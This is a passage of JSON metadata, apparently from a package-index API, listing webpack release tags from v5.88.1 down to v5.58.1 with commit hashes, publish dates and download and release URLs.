GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08